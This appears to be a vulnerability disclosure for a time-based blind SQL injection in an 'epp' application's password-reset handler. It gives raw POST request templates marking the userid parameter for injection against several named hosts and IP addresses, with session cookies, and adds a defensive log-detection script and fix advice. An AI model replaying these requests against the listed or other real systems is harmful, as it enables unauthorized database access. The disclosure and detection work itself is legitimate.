### Brief description:
...
### Detailed description:
The "Forgot password" module of this system has a SQL injection vulnerability.
Link: /epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=1234
[<img src="https://images.seebug.org/upload/201501/10164647850329b74ce2a803fc0de1dd767da668.png" alt="QQ图片20150110164630.png" width="600">](https://images.seebug.org/upload/201501/10164647850329b74ce2a803fc0de1dd767da668.png)
Note: after the username and email are entered and submitted, the page posts the form to /epp/core (visible in the captured request).
Vulnerable parameter: userid
Database system: Oracle
Injection type: AND/OR time-based blind
Proof cases follow (only the database instance name is listed; no further data is extracted):
0x01: http://nc.xhlbdc.com/epp/
```
POST /epp/core HTTP/1.1
Host: nc.xhlbdc.com
Proxy-Connection: keep-alive
Content-Length: 107
Origin: http://nc.xhlbdc.com
Method: POST /epp/core HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
Referer: http://nc.xhlbdc.com/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=8438
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: JSESSIONID=0000zdbG9i3ttIPJ7g2Ayl4KoRm:175j517sp
userid=*&email=&type=forgetPWD&pageId=forgetpwd&pageUniqueId=177ef747-d34f-4076-b627-bf97720fbbdf&isAjax=1
```
[<img src="https://images.seebug.org/upload/201501/10165621d9c4cb2ce4c8e58c932a8d0a2b7607fb.jpg" alt="QQ图片20150110165610.jpg" width="600">](https://images.seebug.org/upload/201501/10165621d9c4cb2ce4c8e58c932a8d0a2b7607fb.jpg)
0x02: http://nc.pinggugroup.com:81/epp/
```
POST /epp/core HTTP/1.1
Host: nc.pinggugroup.com:81
Proxy-Connection: keep-alive
Content-Length: 111
Origin: http://nc.pinggugroup.com:81
Method: POST /epp/core HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
Referer: http://nc.pinggugroup.com:81/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=7158
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: JSESSIONID=0000ZPRlAAMZqeOX2_DUd6dPukK:-1
userid=*&email=aaaaa&type=forgetPWD&pageId=forgetpwd&pageUniqueId=ef251f23-ae34-4047-95f0-2f95f3085cf2&isAjax=1
```
[<img src="https://images.seebug.org/upload/201501/101651300cd5259af6212d618c309048dacc85ad.jpg" alt="QQ图片20150110165121.jpg" width="600">](https://images.seebug.org/upload/201501/101651300cd5259af6212d618c309048dacc85ad.jpg)
0x03: http://123.232.105.202/epp/
```
POST /epp/core HTTP/1.1
Host: 123.232.105.202
Proxy-Connection: keep-alive
Content-Length: 111
Origin: http://123.232.105.202
Method: POST /epp/core HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
Referer: http://123.232.105.202/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=4522
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: JSESSIONID=0000FoJ4EiDJNB9px4Q_Y3g01j9:-1
userid=*&email=aaaaa&type=forgetPWD&pageId=forgetpwd&pageUniqueId=a4004558-4d36-4b1e-a397-6b8217320613&isAjax=1
```
[<img src="https://images.seebug.org/upload/201501/101719046d6d5130e7343471cb3ca73c2534f71f.jpg" alt="QQ图片20150110171850.jpg" width="600">](https://images.seebug.org/upload/201501/101719046d6d5130e7343471cb3ca73c2534f71f.jpg)
0x04: http://zfkg.com:8081/epp/
```
POST /epp/core HTTP/1.1
Host: zfkg.com:8081
Proxy-Connection: keep-alive
Content-Length: 110
Origin: http://zfkg.com:8081
Method: POST /epp/core HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
Referer: http://zfkg.com:8081/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=1234
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: JSESSIONID=843FB4AB3D3B82DDDC089308B9A97A23.server; JSESSIONID=9F6DE9B77CB36498D032BE46B92A6C54.server
userid=*&email=aaaa&type=forgetPWD&pageUniqueId=78c7cfa2-6909-4ee5-b72b-3098364a5369&pageId=forgetpwd&isAjax=1
```
[<img src="https://images.seebug.org/upload/201501/10171737aa5093ace895dbdc1c9f44687ef8eb2f.jpg" alt="QQ图片20150110171723.jpg" width="600">](https://images.seebug.org/upload/201501/10171737aa5093ace895dbdc1c9f44687ef8eb2f.jpg)
http://202.136.213.21/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=1234
http://61.175.97.50//epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=1234
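A time-based blind injection against the `userid` parameter leaves a distinctive trace on the server side: a burst of POSTs to `/epp/core` from one client in which a large share of requests take roughly the injected delay, while ordinary password-reset submissions complete in well under a second. The following detection script is an added example for operators of the affected application and is not part of the original report; it assumes an nginx-style combined access log with `$request_time` (seconds) appended as the last field, and every log line, hostname and address in it is constructed for illustration.

```python
"""Flag clients whose POSTs to the password-reset handler show the latency
signature of time-based blind SQL injection probing.

Added example, not from the original report. Assumes nginx combined log
format with $request_time appended; all sample data below is constructed.
"""
import re
from collections import defaultdict
from statistics import median

# Constructed access-log excerpt (nginx combined format + request_time in
# seconds). Hostnames and client addresses are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2015:16:46:01 +0800] "POST /epp/core HTTP/1.1" 200 312 "http://nc.example.test/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=1234" "Mozilla/5.0" 0.083
10.0.0.7 - - [10/Jan/2015:16:46:20 +0800] "GET /epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=9981 HTTP/1.1" 200 4120 "-" "Mozilla/5.0" 0.031
10.0.0.7 - - [10/Jan/2015:16:46:31 +0800] "POST /epp/core HTTP/1.1" 200 312 "http://nc.example.test/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=9981" "Mozilla/5.0" 0.091
203.0.113.9 - - [10/Jan/2015:16:50:01 +0800] "POST /epp/core HTTP/1.1" 200 312 "http://nc.example.test/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=8438" "Mozilla/5.0" 5.112
203.0.113.9 - - [10/Jan/2015:16:50:07 +0800] "POST /epp/core HTTP/1.1" 200 312 "http://nc.example.test/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=8438" "Mozilla/5.0" 0.084
203.0.113.9 - - [10/Jan/2015:16:50:08 +0800] "POST /epp/core HTTP/1.1" 200 312 "http://nc.example.test/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=8438" "Mozilla/5.0" 5.097
203.0.113.9 - - [10/Jan/2015:16:50:14 +0800] "POST /epp/core HTTP/1.1" 200 312 "http://nc.example.test/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=8438" "Mozilla/5.0" 5.203
203.0.113.9 - - [10/Jan/2015:16:50:20 +0800] "POST /epp/core HTTP/1.1" 200 312 "http://nc.example.test/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=8438" "Mozilla/5.0" 0.088
203.0.113.9 - - [10/Jan/2015:16:50:21 +0800] "POST /epp/core HTTP/1.1" 200 312 "http://nc.example.test/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=8438" "Mozilla/5.0" 5.151
"""

# nginx combined format: ip ident user [time] "method path proto" status bytes
# "referer" "user-agent", followed by the appended request_time.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)" (?P<rt>[\d.]+)$'
)


def parse_line(line):
    """Parse one access-log line into a dict; return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["rt"] = float(rec["rt"])
    return rec


def find_time_based_probes(log_text, endpoint="/epp/core",
                           slow_seconds=4.0, min_slow=3):
    """Return one finding per client whose POSTs to `endpoint` include at
    least `min_slow` responses slower than `slow_seconds`.

    Each slow response in a blind probe corresponds to one true condition, so a
    real extraction produces many of them; a single slow request is more likely
    to be an ordinary backend hiccup and is not reported on its own.
    """
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == endpoint:
            per_ip[rec["ip"]].append(rec["rt"])

    findings = []
    for ip, times in sorted(per_ip.items()):
        slow = [t for t in times if t >= slow_seconds]
        fast = [t for t in times if t < slow_seconds]
        if len(slow) < min_slow:
            continue
        findings.append({
            "ip": ip,
            "requests": len(times),
            "slow_requests": len(slow),
            # Typical latency of this client's non-delayed requests, for contrast.
            "baseline_seconds": round(median(fast), 3) if fast else None,
            "min_slow_seconds": round(min(slow), 3),
        })
    return findings


if __name__ == "__main__":
    for f in find_time_based_probes(SAMPLE_LOG):
        print(f"{f['ip']}: {f['slow_requests']}/{f['requests']} POSTs to /epp/core "
              f"took >= {f['min_slow_seconds']}s (baseline {f['baseline_seconds']}s)")
```

The threshold is deliberately well above normal request latency so that a slow database on its own does not trigger an alert; what distinguishes a probe is the count of delayed responses from one client, not any single one. Detection of this kind only limits exposure; the defect itself is removed by binding `userid` through a parameterized query (a JDBC `PreparedStatement` in a JSP application) instead of concatenating it into SQL text.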
### Proof of vulnerability: